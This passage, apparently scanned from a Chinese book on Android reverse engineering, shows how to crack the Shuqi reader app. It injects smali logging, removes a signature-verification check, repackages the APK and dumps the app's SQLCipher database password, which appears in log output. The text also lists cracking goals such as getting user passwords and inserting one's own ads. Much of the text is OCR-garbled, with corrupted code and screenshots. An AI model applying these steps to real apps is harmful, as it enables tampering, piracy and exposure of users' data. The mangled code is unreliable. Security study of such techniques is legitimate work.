这 需要 重新 看 看 它 的 代码 ， 看 是 否 做 了 校 验 。 在 分 析 代 码 的 时 候 ， 要 先 看 看 它 有 没有 目 己 定义 Application， 如 果 有 定义 的 
话 ， 就 需要 看 它 自己 的 Application 类 ， 这 里 看 到 它 定 了 自己 的 Application: com.shuqi.application.ShuqiApplication, 


解压 apk， 得 到 dex， 然 后 用 dex2jar 进 行 转化 ， 得 到 jar， 再 用 jd-gui 查 看 这 个 类 ， 如 图 20-6 所 示 。 


2 Јата De T топ. 
File Edit Mawgate Search Help 
о a | Ф = 
classes dex2jar.ar х - 
p-f android . | ShuqiñApplication.ciass x ' É 
B-E com d = true: " 
村 -= EH aaa ] 


£F BB alipay.andreid.app 


H-E aliyun.mbaas public static boolean ef) 


I 


+- android.volley.toolbox — 
H-H сс ] 
H- google 
i 出 j256.ormlite public static void f() 
t [ 
9-88 mobgi — d = false; 
H-E pubukeji.diandecws ub): 
+- аде вї.а(}: 
5-88 shuqi yv.a().c(): 
由 -机 activity | Log.e("ShugiApplication", "Exit..."); 
4-H3 agoo.push 
3-88 application public void enCreate |} 
3i- [fj PasswordProcess t 
? — super. 0: 
=] ShuqiApplication ba — 
J-i ShuqiApplication vr.h(this); 
95 a : String Aab.a(false, false): 


ba.a() .a(this); 
vd.a[(this, ai-e); 
Sysatem.loadLibrary("psProcess"): 


nš b : ShuqiApplication 


55 с: Handler 


о d : boolean SüLiteDatabase.loadLibs(this]; 
è ShuqiApplication() xd.a().a[this): E 
5 a) : Handler yk.a(this); 
| ame.ai): 
(uc ama. a (this); 
@5 c) : ShuqiApplication if {акс.Ь({)) 


f dû : void Thread.setDefaultUncaughtExceptionHandler(gx.a()):; 
gf e : boolean а = getPrackagelame(): 
& fi : void 
Ф onCreate() : void 
H- common 


Fnd: MEER = Ф| Next i Previous | |Case sensitive x 
ШИШ UN o d == шш шш ,ll а 


820-6  jd-gui & HA 


这 里 看 到 它 的 代码 做 混 消 了 ， 但 是 一 些 系 统 回调 方法 肯定 不 能 混淆 的 ， 比 如 onCreate 方 法 。 这 里 一 般 找 问题 的 方法 是 : 

1) 首先 看 这 个 类 有 没有 静态 方法 和 静态 代码 块 ， 因 为 这 类 的 代码 会 在 对 象 初始 化 之 前 运行 ， 可 能 在 这 里 加 载 so 文件 ， 或 者 
是 加 密 校 验 等 操作 。 

2) 再 看 看 这 个 类 的 构造 方法 。 

3) 最 后 再 看 生命 周期 方法 。 

看 到 它 的 核心 代码 在 onCreate 中 ， 调 用 了 很 多 类 的 方法 ， 猜 想 这 里 的 某 个 方法 做 工作 了 。 这 时 可 注入 代码 来 跟踪 是 哪个 方 
法 出 现 问 题 了 。 


下 面 来 看 看 性 么 添加 日 志 信 息 ， 残 是 添加 日 志 ， 需 要 修改 smali 文 件 ， 再 去 查看 smali 源 码 : 


# virtual methods 
.method public onCreate()V 
.locals 1 


.prologue 
const/4 vO, 0х0 


.line 41 
invoke-super {p0}, Landroid/app/Application;-»onCreate()V 


.line 42 
sput-object p0, Lcom/shuqgi/application/ShuqiApplication;-»b:Lcom/shugi/ 
application/ShuqiApplication; 


invoke-static (3j, LMyLog;-»print()V 


.line 43 
tinvoke-static {p0}, Lvr;-»h(Landroid/content/Context ;)V 


invoke-static {}, LMyLog;-»print()v 


.line 44 
invoke-static {у0,у0}, Lab;-»a(zz)V 


хои 1788 70020556, ВАЕН ЕНЕ, KEMAGA. Баа 
这 里 调用 系统 的 log 方 法 ， 但 是 有 两 个 问题 : 


. 需要 导入 包 ， 在 smali 中 修改 。 
` 需要 定义 两 个 参数 : tag、msg， 才 能 正常 打印 log。 


明显 这 个 方法 有 点 麻 烦 。 另 外 一 种 方式 就 上 自己 定义 一 个 MyLog 类 ， 然 后 有 反 编 译 ， 得 到 MyLog 的 smali 文 件 ， 添 加 a 到 这 个 
ShuqiApplication.smali 的 root 目 录 下 ， 然 后 在 代码 中 直接 调用 即 可 。 放 到 root 目 录 下 的 目的 是 在 代码 中 调用 就 不 需要 导入 包 
了 ， 比 如 SuqiApplication.smali 中 的 一 些 静 态 方法 调用 ， 如 图 20-7 所 示 。 


"PP 
зі.а(); 
уу.а().с(); 
Log.e("ShugiApplication", "Exit...")., 
} 


public void onCreate () 


[+] 
[=) [= [9 [= E [E Ë= [9 ЕЕ) = E= E= E= = ES E= ES [2 ES E 


ab.a(false, false); 
b3.a().a(this); 
vd.a(this, з1.е); 
— €—€—— "psProcess"); 


xd. apu етти - 
vk.a(this); 
ame.a():; 


| = ama.a(this); 

由 - VU r Thread.setDefaultUncaughtExceptloni 
Б. vv | а = getPackageName () ; 

由 - 国 vw | | 


9207 静态 方法 调用 
编写 日 志 类 MyLog， 这 里 就 不 粘贴 代码 了 ， 新 建 一 个 项 目 之 后 ， 反 编译 得 到 MyLog.smail 文 件 ， 放 到 目录 中 : 


.Class public LMyLog; 
.Super Ljava/lang/Object; 


.Source "MyLog.java" 


# static fields 
.field private static final TAG:Ljava/lang/String; = "JW" 


# direct methods 
¿method public constructor «init»()V 
.locals 0 


.prologue 
.line 5 


invoke-direct {p0}, Ljava/lang/Object;-»«init»()V 


return-void 
.end method 


method public static log(Ljava/lang/Object;)V 


.locals 3 

.param pO, "obj" # Ljava/1lang/Object; 
.prologue 

.line 10 

const-string vü; "ЈМ" 


new-instance v1, Ljava/lang/StringBuilder; 
const-string v2, "msg:" 


invoke-direct (vl, v2j, Ljava/lang/StringBuilder;-»«init»(Ljava/lang/ 
String;)V 


invoke-virtual (vl, p0}, Ljava/lang/StringBuilder;-»append(Ljava/lang/ 


Object;)Ljava/lang/StringBuilder; 


move-result-object vi 


invoke-virtual {v1}, Ljava/lang/StringBuilder;-»toString()Ljava/lang/String; 


move-result-object v1 


得 到 这 个 文件 的 时 候 ， 一 定 要 注意 ， 把 MyLog.smali 的 包 名 信息 删除 ， 因 为 放 到 root 目 录 下 的 ， 意 味 着 这 个 MyLog 


有 任何 包 名 的 ， 这 需要 注意 ， 不 然 最 后 加 也 是 报错 的 。 


在 ShuqiApplication 的 onCreate 方 法 中 插入 的 日 志方 法 ， 如 下 所 示 : 
invoke-static {}, LMyLog;-»print()V 
* virtual methods 


.method public onCreate()V 
.locals 1 


.prologue 
COD A4 xU. Ust) 


.line 41 
invoke-super {p0}, Landroid/app/Application;-»onCreate()V 


.line 42 
sput-object p0, Lcom/shuqi/application/ShuqiApplication;-»b:Lcom/shuqi/ 
application/ShuqiApplication; 


invoke-static {}, LMyLog;-»print()V 


.line 43 
dtinvoke-static {p0}, Lvr;-»h(Landroid/content/Context;)V 


invoke-static {}, LMyLog;-»print()V ҮЕ AJIFH Н ife 


.line 44 
invoke-static {у0, v0}, Lab;-»a(ZZ2)V 


invoke-static (), LMyLog;-»print()V 


.line 45 
invoke-static {}, Lbs;-»a()Lbs; 


move-result-object v0 
invoke-virtual (v0, p0}, Lbs;-»a(Landroid/content/Context;)V 


.line 46 
sget-object v0, Lsi;-»e:Ljava/lang/String; 


invoke-static {р0, v0), Lvd;-»a(Landroid/content/Context;Ljava/lang/String;)V 
invoke-static {}, LMyLog;-»print()V 


.line 47 
const-string v0, "psProcess" 


invoke-static (v0), Ljave/lang/System;-»1loadLibrary(Ljava/lang/String;)V 
.line 48 
invoke-static {p0}, Lnet/sqlcipher/database/SQLiteDatabaes;- 


»LoadLibs(Landroid/content/Context;)V 


invoke-static {}, LMyLog;-»print()V 


在 加 代码 的 时 候 需 要 注意 ， 要 找 对 地 方 加 ， 融 是 在 上 个 方法 调用 完 之 后 添加 ， 比 如 : invoke-virtual, invoke-staticz, rmm 
且 这 些 措 令 后 面 不 能 有 move-result-object， 因 为 这 个 指令 是 获取 方法 的 返回 值 ， 所 以 一 般 是 这 么 加 代码 的 : 


- 在 invoke-static/invoke-vitrtual 指 令 返 回 类 型 是 V 之 后 可 以 加 入 。 


.在 invoke-static/invoke-viftual 指 令 返 回 类 型 不 是 V， 那 么 在 move-tesult-object 命 令 之 后 可 以 加 入 。 
| 


加 好 了 日 志 代 码 之 后 束 回 编译 执行 ， 在 这 个 过 程 中 可 能 会 遇 到 samili 语 法 错误 ， 针 对 指定 的 文件 修改 丈 可 以 了 ， 得 到 回 编译 
的 apk 之 后 ， 可 以 再 反 编 译 一 下 ， 看 看 它 的 Java 代 码 ， 如 图 20-8 所 示 。 


| -D ShugiApplication 
由 -出 соттоп Е! ВЕЕ 


; ые! 
^ | ShugiApplication.dass x| vdass | | 


由 -出 controller 
ю-- 8g database.model 


可 以 看 到 添加 的 代码 ， 在 每 个 方法 之 后 打印 信息 。 下 


public static void f() 


&-B download.database { 
由 -由 interfaces.web наш 
&-88 model.bean.gson si.a(); 
由 ~ 出 sdk.ad yy.a() -c(): 
由 -出 service Log.e("ShugiApplication", "Exit..."):; 
5-8 swiftp i 
- ËB sina.sso public void onCreate() 
-H ta.utdid2 | 
-8 taobao super.onCreate(); 
-H3 tencent фи — 
MyLog.print(); 
“出 umeng vr.h(this); 
-H weibo.sdk.android MyLog.print(): 
| natsqicipher ими false); 
Ба . MyLog.print(); 
' nl.siegmann.epublib bs.a() .a(this); 
| org vd.a(this, si.e); 
| waly MyLog.print(): 
| MyLog System.loadLibrary("psaProcess"); 
| SüLiteDatabase.loadLibs(this):; 
ET MyLog.print(): 
| aa xd.a().a(this):; 
| aaa vk.a(this); 
| aab MyLog.print(): 
a ame.a(); 
| MyLog.print(): 
ааа ama.a(this); 
| aae MyLog.print(): 
| aaf if (akc.b()) 
| aag ee IX. 
| aah ) — 


添加 日 志 之 后 的 代码 


面 运行 程序 ， 同 时 开启 log 的 tag: 


adb logcat -s JW 


C:NUsersMVjiangweil-g»adb logcat -s JW 
икске ү beginning of /dev/log/system 
——— beginning of /dev/log/main 


I/JW (22557): msg:debug... 
I/JW (22557): msg:debug... 
I/JW (22557): msg:debug. 

I/JW (22557): msg:debug... 
I/JW (22557): msg:debug. 

I/JW (22557): msg:debug... 
I/JW (22557): msg:debug... 
I/JW (22557): msg:debug... 
I/JW (22676): msg:debug... 
I/JW (22676): msg:debug... 
I/JW (22676): msg:debug... 
I/JW (22676): msg:debug... 
I/JW (22676): msg:debug... 
I/JW (22676): msg:debug... 
I/JW (22676): msg:debug. 

I/JW (22676): msg:debug... 


看 人 到 J 印 的 日 志 了 ， 友 现 打 FD 了 三 个 log， 这 里 需要 注意 的 是 ， 虽然 打包 了 三 个 log， 但 是 都 是 在 不 同 的 进程 中 ， 一 个 进程 中 
的 log 只 打印 了 一 个 ， 所 以 判断 ， 间 题 出 现在 vr.h 这 个 方法 ， 如 下 所 示 : 


public void onCreate() 
{ 

super.onCreate (); 

b = this; 


MyLog.print(); 

ab.a(false, false); 
MyLog.print(); 

bs.a().a(this); 

vd.a(this, 3i.5); 
MyLog.print(): 

System. loadLibrary("psProcess"); 
SQLiteDatabase.loadLibs(this);| 


但 看 这 个 万 法 源码 如 下 所 示 : 


public static void h(Context paramContext) 
{ 
PackageManager localPackageManager = paramContext.getPackageManager(]); 
try 
{ 
if (-1936262660 != localPackageManager.getPackageInfo (рагашСопсехс.десРаскадеНаше (), 64) .Signatures [0] .hashCode () ) 


Process.killProcess(Process.myPid()); 
return; 


} 
catch (Exception localException) 


[ 
System.exit(-1); 
} 


3 


果然 ， 这 个 方法 做 了 签名 验证 ， 校 验 不 正确 的 话 ， 和 直接 退出 程序 。 那 么 现在 要 想 正 常 运行 程序 的 话 ， 直 接 注 释 用 “#”， 注 
释 smali 对 应 的 这 行 代 码 : vr.h (this) 。 

然后 回 编译 ， 再 运行 ， 果 然 不 报 氏 了， 这 里 融 不 再 演示 了 : 

# virtual methods 


.method public onCreate()V 
.locals 1 


.prologue 
const/4 vü; 0х0 


.line 41 
invoke-super {p0}, Landroid/app/Application;-»onCreate()V 


.line 42 
sput-object p0, Lcom/shuqgqi/application/ShugiApplication;-»b:Lcom/shugi/ 
application/ShuqiApplication; 


invoke-static {}, LMyLog;-»print()V 


这 个 方法 有 问题 


invoke-static {}, LMyLog;-»print()V 


.line 44 
invoke-static (vO, v0}, Шар; ->а (27) Уу 


上 面 是 通过 注入 代码 来 跟 路 问题 ， 这 个 万 法 很 常用 ， 也 很 实在 。 


20.5.2 静 仿 分 析 native 代 人 码 


下 面 介 绍 如 何 使 用 IDA 来 静态 分 析 native 代 码 。 在 反 编 译 之 后 ， 看 到 它 的 onCreate 万 法 中 有 一 个 加 载 so 的 代码 ， 如 下 所 


public void onCreate () 
{ 
super.onCreate (); 
b = this; 
vr.h(this); 


ab.a(false, false); 


bs.a(). igne da 


xd.a() .a (this); 
vk.a(this); 
ame.a(); 


看 看 这 个 代码 ， 如 下 所 示 : 


package com.shuqi.application; 


public class PasswordProcess 


{ 


public static native String getDbAESEncryKey (); 


public static native String getDbPassvord(); 


public static native String getLgPassvord(String paramString); 


获取 密码 的 方法 是 native 的 ， 残 来 看 看 getDbPassword 方 法 。 用 IDA 打 开 libpsProcess.so 文 件 ， 如 图 20-9 所 示 。 


Library function 


Functions window Пп m x 
Function name Segment “ 
F] memcpy .plt 
[7] strcat .plt 
[7] android log print рії 
F] memset .plt = 
A strlen .pt 
A sprintf рії 
[7] stack chk fail рії 
(f| gnu Unwind Find exidx рії n: 
F] abort .plt 
[7] cxa begin cleanup .plt 
A cxa type match рії 
[7] sub EFC text 
[7] Jetring2CStr text 
[7] check text 
F] Java com shuqi application PasswordProcess getDbAE... .text 
F] Java com shugi application PasswordProcess getlgPas... .text 
[7] Java com shugi application PasswordProcess getDbPa... .text 
因 MD5Init text 
A MD5Update text 
[7] MD5Final text 
F] sub 1AF0 text 
F] sub 319C text 
[7] sub 32B4 text 
(f| sub 3390 text 
[7] sub 33FC text - 
4 | " А 


A AXN ASRI, 


BL android log print, 


运行 程序 看 起 log， 此 时 也 可 以 在 Java 


Data Regular function BÉ Unexplored Ё Instruction 


External symbol 


| (B IDA ViewA ÜB 


.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 
.text 


. qu 


©] Hex View-A (C 


:00001760 loc 1760 
: 00001760 
: 000017654 
: 00001768 
: 00001 76C 
:00001770 
:00001774 
:00001778 
:0000177C 
: 00001780 
: 00001784 
: 00001788 
:0000178C 
:00001790 
:00001794 
: 00001798 
:0000179C 
: 00001 780 
:00001 7054 
: 00001 788 
: 00001 тас 
: 00001 B0 
:00001 B^ 
: 00001 B4 
:00001 B^ 
: 00001 7B8 
: 00001 7BC 
:000017C0 
:000017C^4 


loc 1T7B^4 


[А] Structures (3 


LDR 
СМР 
BLE 
SUB 
MOU 


LDR 
ADD 
MOU 


LDR 
LDR 
SUB 
LDR 
MOU 
BLX 
MOU 


MOU 
LDR 
LDR 
LDR 
LDR 


图 20-9 IDA 打 开 so 文件 内 容 


一 般 直 接 看 BL/BLX 等 信息 ， 跳 转 逻 辑 ， 还 有 融 是 返 
这 是 企 native 层 调用 log 的 函数 。 有 再 往 上 看 ， 友 现 tag 是 System.out.c。 


ВЗ, [В11 
R3, #0xF 
loc_1718 


R12, R11, 


RO, #4 


R3, a 
R3, PC, 
R2, R3 
_androi 


Imports 


E] Exports 


; CODE XREF: Jaua, com, shuqi, application P 


,Hvar 00] 


H-var. 88 


""System.out.c" 


- ин 
R3 "Xs" 


d, log print 


R3, [R3] 


R3, [R3, 
R2, R11, 
RO, [R11 
R1, R2 
R3 

R3, RO 


RO, R3 
R3, =(__ 
R3, [R4, 
R2, [R11 
R3, [R3] 


H0x29C] 
H-var, 88 
,Hvar,. 88] 


; CODE XREF: Jaua, com, shuqi, application P 


stack, chk, guard, ptr - Өх5ЕВС) 


R3] ; ..stack, chk, guard 
,Hvar, 10] 


000017AC 000017AC: Java com shuqi application PasswordProcess getDbPassword-*204 


ЕМЕ, ЕАУ) 897 AGAT ERES, Bim 


层 添加 日 志 的 : 全 局 搜索 这 个 方法 ， 友 现在 yi 这 个 


类 中 调用 ， 如 图 20-10 所 示 。 


| ShugiApplication.cass | yidass x 
} 
} 


private SQLiteDatabase dl() 

{ | 
return yj.a(ShugiApplication.b()).getWritableDatabase(PasswordProcess. getDbPassvord() ); 

} 


// ERROR // 
private boolean d(String paramString) 
{ 


// Byte code: 


图 20-10 ”获取 数据 库 密码 代码 


修改 yi.smali 代 码 : 


.method private d()Lnet/sqlcipher/database/SQLiteDatabase; 


.locals 2 

.prologue 

.line 1025 

invoke-static {}, Lcom/shuqi/application/ShuqiApplication;-»b()Landroid/ 
content/Context ; 


move-result-object v0 
invoke-static (v0), Lyj;-»a(Landroid/content/Context;)Lyj; 
move-result-object v0 


invoke-static {}, Lcom/shugi/application/PasswordProcess;-»getDbPassword() 
Ljava/lang/String; 


move-result-object v1 
invoke-static (vl), LMyLog;-»log(Ljava/lang/Object;)V 


invoke-virtual (v0, vl), Lyj;-»getwritableDatabase(Ljava/lang/String;)Lnet/ 
sqglcipher/database/SQLiteDatabase; 


move-result-object v0 


return-object v0 
.end method 


可 以 看 到 ， 这 个 应 用 使 用 了 sqlcipher 框 架 进行 了 数据 库 的 加 密 。 其 实现 在 很 多 应 用 加 密 数 据 库 都 是 使 用 这 个 框架 的 ， 微 信 
也 是 使 用 这 个 框架 对 本 地 通讯 信息 数据 库 进 行 加 密 的 ， 这 个 加 密 工 具 对 应 的 有 一 个 Window 程 序 可 以 打开 它 ， 不 过 需要 密码 ， 如 
图 20-11 所 示 。 


SOLite Database Browser 


kj o m FE m ri Pt E 


latabaze Structure Browsze Data Execute SEL 


Нате | ОБјес+ Туре |Schema 


Pozzible а ciphered file, try with pragma key" 


图 20-11 ”打开 加 密 的 数据 文件 


w 


如 果 想 破解 加 密 的 数据 库 内 容 ， 只 要 得 到 加 密 数 据 库 密码 即 可 ， 而 这 个 密码 一 般 是 保存 在 本 地 的 ， 只 要 在 本 地 束 有 办 法 获取 
的 。 


回 编译 ， 再 运行 程序 ， 开 局 log， 如 图 20-12 所 示 。 


adb logcat -s JW 
adb logcat -s System.out.c 


d.exe - adb logcat -s System.out. 


Microsoft Windows [HE 6.1.7601] А 
С:\Џѕеғе\јіапомеі>ааь logcat -s JU 版 权 上 也 有 (с) 2009 Microsoft Corporation, {Ж PLE AAI, — 
beginning of /deu/log/main » І 
beginning of /deu/loo/sustem C:NUsersNj1angwei»adb logcat -s System.out.c 
6947): msg:a35ed519895a0ef'a660dbaT 78a05ccO beginning of /deu/log/system 
6947): msg:a354ed519895a0ef'a660dbaT 78a05ccO beginning of /deu/log/main 
6947): msg:a35ed519895a0ef'1a660dba?78a05ccO0 .out.c( 5848): a35ed519895aO0efHa660dba778a05ccO0 
6947): msg:a35ed519895a0ef41a660dba778a05ccO .out.c( 5848): a3Hed519895a0efHa660dba?18a05cc0 
6947): msg:a35ed519895a0ef'ia660dba?78a05cc0 .Out.c( 5848): a3Hed519895a0efHa660dbaT78a05cc0 
6947): msg:a34ed519895a0ef4a660dba778a05cc0 .Out.c( 5848): a3Hed519895a0efHa660dba778a05ccO0 
6947): msg:a35ed519895a0ef'1a660dba778a05ccO .out.c( 5848): a3Hed519895a0efhHa660dba?78a05cc0 
6947): msg:a34ed519895a0ef4a660dba778a05cc0 .out.c( 5848): a354ed519895a0ef'ia660dba?78a05ccO0 
6947): msg:a35ed519895a0ef4a660dba778a05ccO .Out.c( 5848): a3Hed519895aO0ef'a660dba?78a05ccO 
.out.c( 5848): a3Hed519895a0ef"Ha660dba?78a05cc0 
.out.c( 5848): a3Hed519895a0ef'a660dba?78a05ccO 
.out.c( 5848): a3Hed519895a0efHa660dba?78a05cc0 
.out.c( 5848): a3Hed519895a0efHa660dba?78a05cc0 
.out.c( 5848): a34ed519895a0ef4a660dba778a05cc0 
.out.c( 5848): a3Hed519895a0ef'Ha660dba?78a05cc0 
.Out.c( 5848): a3Hed519895a0efHa660dba778a05ccO0 
.out.c( 5848): a3Hed519895a0efHa660dba?78a05cc0 
.out.c( 5848): a3H4ed519895a0ef*Ha660dba?78a05cc0 
.out.c( 5848): a3Hed519895aO0efHa660dba?78a05ccO0 
.out.c( 5848): a3Hed519895a0efHa660dba?78a05cc0 
.out.c( 5848): a3Hed519895a0ef'ia660dba?78a05ccO 
.out.c( 5848): a3Hed519895a0efHa660dba?78a05cc0 M 


GM qM ^^ qM qM N N N AN 


图 20-12 ”打印 日 志 信息 
上 友 现 ， 返 回 的 密码 Java 层 和 native 层 是 一 样 的 。 襄 明 静 态 分 析 native 还 是 有 效 的 。 
提示 : 案例 下 载 地 址 为 http://download.csdn.net/detail/jiangwei0910410003/9308217。 
案例 中 有 个 说 明文 件 ， 运 行 前 请 阅读 。 


本 节 通 过 案例 介绍 了 如 何 使 用 静态 方式 去 破解 “个 apk， 在 破解 “个 apk 的 时 候 ， 其 实 就 是 改 点 代码 ， 然 后 能 够 运行 起 来 ， 
达到 想 要 的 功能 ， 一 般 步 又 如 下 : 


1) 注释 特定 功能 ， 比 如 广告 展示 等 。 
2) 得 到 方法 的 返回 值 ， 比 如 获取 用 户 的 密码 。 
3) 添加 指定 的 代码 ， 比 如 加 入 目 己 的 监测 代码 和 广告 等 。 


在 静态 分 析 代 码 的 时 候 ， 需 要 遵循 的 大 体 路 线 如 下 : 首先 能 够 反 编 译 ， 得 到 AndroidManifest.xml 文 件 ， 找 到 程序 入 口 代 
码 。 找 到 想 要 的 代码 逻辑 ， 一 般 会 结合 界面 分 析 ， 比 如 要 想 登 录 成 功 ， 肯 定 想 要 得 到 用 户 登 录 界 面 Activity， 这 时 可 以 用 adb 
shell dumpsys activity top 命 令 得 到 Activity 名 称 ， 然 后 用 Eclipse 上 自 市 的 程序 当前 视图 分 析 工 具 得 到 控件 名 称 ， 或 者 在 代码 中 获 
取 layout 布 局 文件 ， 一 般 是 setContentView 方 法 的 调用 地 方 ， 然 后 用 布局 文件 结合 代码 得 到 用 户 登 录 的 逻辑 ， 进 行 修 改 。 

- 在 关键 的 地 方 通过 代码 注入 技术 来 跟踪 代码 执行 逻辑 。 

` 注意 方法 的 返回 值 ， 条 件 判 断 等 比较 显眼 的 代码 。 

有 些 apk 中 的 源码 可 能 有 自己 的 加 密 算法 ， 这 时 候 需 要 获取 到 这 个 加 密 方 法 ， 如 果 加 密 方法 比较 复杂 ， 就 需要 大 批 的 测试 数 
据 来 获取 这 个 加 密 方法 的 逻辑 ， 一 般 是 输入 和 输出 作为 一 个 测试 用 例 。 

对 于 System.loadLibrary 加 载 so 文件 的 代码 ， 只 需要 找到 这 个 so 文件 ， 然 后 用 IDA 打 开 进 行 静态 分 析 ， 因 为 有 些 apk 中 把 加 
密 算法 放 到 了 so 中 了 ， 这 时 候 也 可 以 通过 测试 数据 来 获取 加 密 算法 。 


通过 上 面 的 例子 ， 可 以 得 出 一 个 经 验 ， 就 是 现在 很 多 apk 会 做 一 些 校 验 工作 ， 因 为 一 般 在 代码 中 包含 “signature” 字 符 申 
言 息 ， 所 以 可 以 全 局 搜索 一 下 ， 也 许 能 获取 一 些 重 要 信息 ， 如 图 20-13 所 示 。 


Search string (* = any string, ? = any character): 


signature 

Search For Limit To 

Type Constructor String Constant Declarations 
Field Method References 


18 matching items: 


E- . C: UsersAjiangwelMDesktopW$25 447 Androide mix Androide fimi Vclassestemp_ dex2jar.ja! 
: B-BB com 
日 -出 mobgi.lib.b 


3-8 tencent 


! | 
由 -由 mm.sdk.openapi | 

‚8-88 weibo.sdk.android.component.sso 

2-8 weibo.sdk.android.sso 


图 20-13 ”签名 校 验 关键 字 搜索 结果 


20.6 ”本 章 小 结 


本 章 主要 介绍 了 如 何 通 过 静态 分 析 方 式 进行 破解 ， 介 绍 了 一 些 工具 的 使 用 ， 以 及 破解 流程 、 破 解 技巧 。 最 常用 的 就 是 代码 注 
入 技术 和 全 局 搜索 关键 字符 串 等 方式 。 可 以 看 到 ， 现 在 市 面 上 的 很 多 apk， 仅 通过 静态 分 析 是 无 法 满足 破解 需求 了 ， 所 以 动态 分 
析 方 式 就 来 了 ， 而 且 动 态 方式 破解 难度 会 很 大 ， 需 要 掌握 的 东西 也 很 多 ， 后 面 篇 章 会 一 一 介绍 动态 破解 的 技巧 和 第 见 的 问题 。 而 
静态 方式 破解 也 很 重要 ， 是 动态 分 析 的 前 提 ， 所 以 这 两 种 技术 都 必须 很 好 地 掌握 。 


第 21 章 ”动态 调试 smali 尖 人 码 


本 章 开 始 介绍 另外 一 种 破解 apk 方 式 : 动态 方式 。 动 态 方式 相对 于 静态 方式 来 说 难度 大 一 点 ， 但 是 它 比 静态 方式 高 效 ， 能 够 
针对 更 多 的 破解 范围 。 破 解 一 般 的 apk 没 有 任何 问题 ， 不 过 不 能 代表 能 够 破解 所 有 的 apK， 因 为 没有 绝对 的 安全 ， 也 是 没有 绝对 的 


破解 ， 双 方 都 在 进步 ， 只 能 具体 问题 具体 分 析 。 


首先 需要 解释 一 下 ， 为 什么 调试 smali 源 码 ， 而 不 是 Java 源 码 ， 因 为 进行 过 反 编译 的 人 知道 ， 使 用 apktool 反 编译 apk 之 后 ， 会 有 
一 个 smali 文 件 夹 ， 这 里 存放 了 apk 对 应 的 smali 源 码 。 


21.1 mes 


第 一 步 : нарк 


通过 apktool 工 具 进 行 apk 的 反 编 译 ， 得 到 smali 源 码 和 AndroidManifest.xml， 然 后 修改 AndroidManifest.xml 中 的 debug 


属性 为 true， 同 时 在 入 口 处 加 上 waitForDebug 人 代码， 进行 debug 等 待 。 一 般 人 入口 都 是 先 找到 入 口 Activity 的 onCreate 方 法 中 的 
第 一 行 处 ， 这 里 需要 注意 的 是 ，apktool 工 具 一 定 要 加 上 -d 参 数 ， 这 样 反 编译 得 到 的 文件 是 Java 文 件 ， 这 样 才能 够 被 Eclipse 识 
别 ， 进 行 调试 。 


第 二 步 : 回 编译 apk 


修改 完成 AndrolidManifest.xml 和 添加 waitForDebug 之 后 ， 需 要 使 用 apktool 进 行 回 编译 ， 回 编译 之 后 得 到 的 是 一 个 没 
签名 的 apk， 还 需要 使 用 signapk.jar 来 进行 签名 ， 签 名 文件 直接 使 用 测试 程序 的 签名 文件 就 可 以 ， 最 后 进行 安装 。 


第 三 步 : 将 反 编 译 smali 工 程 导入 Eclipse 


将 反 编 译 之 后 的 smali 源 码 导入 到 Eclipse 工程 中 ， 找 到 天 键 点 ， 进 行 下 断 点 。 这 里 的 天 键 点 ， 一 般 是 先 大 致 了 解 程序 运行 的 
结构 ， 然 后 找到 需要 破解 的 地 方 ， 使 用 View 分 析 工 具 ， 或 者 使 用 d-gui 工 具 和 直接 查看 apk 源 码 (使 用 dex2jar 将 dex 文 件 转化 成 
jar 文 件 ， 然 后 用 jd-gui 进 行 查看 ) ， 找 到 代码 的 大 体位 置 ， 然 后 下 断 点 。 这 里 可 以 借助 Eclipse 的 DDMS 自 市 的 View 分 析 工 具 找 
到 对 应 控件 的 resid， 然 后 全 局 搜索 这 个 控件 的 resid， 或 者 直接 在 values/public.xml 中 人 查找， 最 终 定位 到 这 个 控件 位 置 ， 再 查看 
七 的 点 击 事件 即 可 。 


第 四 步 : 设置 远程 调试 


设置 远程 调试 工程 ， 首 先 运行 需要 调试 程序 ， 然 后 在 DDM S 中 找到 对 应 的 调试 服务 端的 端口 号 ， 然 后 在 Debug 
Configurations 中 设置 远程 调试 项 目 ， 设 置 对 应 的 调试 端口 和 ip 地 址 (一 般 都 是 本 机 pc， 那 就 是 localhost) ， 然 后 红色 小 师 蛛 
变 成 绿色 的 ， 表 示 远 程 调试 项 目 连 接 关 联 上 了 调试 程序 。 这 里 需要 注意 的 是 ， 一 定 需要 关联 正确 ， 不 然 是 没有 任何 效果 的 ， 关 联 
成 功 之 后 ， 就 可 以 进行 操作 。 


第 五 步 : 调试 apk 程 序 


操作 的 过 程 中 ， 会 进入 到 关键 的 断 点 处 ， 通 过 F6 单 步 ，F5 单 步 进入 ，F7 单 步 跳 出 ， 进 行 调试 。 找 到 关键 方法 ， 然 后 通过 分 
析 smali 语 法 了 解 逻 辑 ， 如 果 人 逻辑 复杂 的 ， 可 以 通过 查看 具体 的 环境 变量 的 值 来 观察 ， 这 里 也 是 最 重要 的 ， 也 是 最 复杂 的 ， 同 时 
这 里 也 是 没有 规 草 可 寻 的 ， 这 与 每 个 人 的 逻辑 思维 以 及 破解 能 力 有 关系 。 分 析 关 键 的 加 密 方 法 是 需要 功底 的 ， 当 然 这 里 还 需要 注 


总 一 个 信息 ， 残 是 Log 日 志 ， 这 有 时 候 也 是 很 重要 的 一 个 信息 。 
第 信步: 编写 代码 实现 核心 逻辑 


当知 道 了 核心 方法 的 逻辑 ， 要 想得到 正确 的 密码 ， 还 是 需要 自己 用 语言 去 实现 逻辑 的 ， 需 要 手动 编写 代码 才能 得 到 正确 的 密 
码 。 


21.3 mJ 


本 章 介 绍 了 如 何 使 用 Eclipse 动 态 调试 反 编译 之 后 的 smali 源 码 ， 这 种 方式 比 静 态 方式 高 效 很 多 ,但 是 现在 市 场 上 的 大 部 分 应 用 
没有 这 人 么 简单 就 破解 了 ， 比 如 核心 的 加 窗 算 法 放 到 了 native 层 去 做 ， 那 么 这 时 候 就 需要 去 动态 调试 so 文件 ， 这 是 下 一 章 的 内 容 。 


第 22 章 ”IDA 工具 调试 so 源码 


本 章 继续 介绍 逆向 apk 的 相关 知识 ， 主 要 介绍 如 何 使 用 IDA 来 调试 Andtoid 中 的 native 源 码 ， 因 为 现在 有 一 些 App， 为 了 安全 或 
者 效率 问题 ， 会 把 一 些 重要 的 功能 放 到 native 层 ， 那 么 用 Eclipse 调试 smali 源 码 就 显得 很 无 力 了 ， 因 为 Andtoid 中 native 层 使 用 的 是 so 
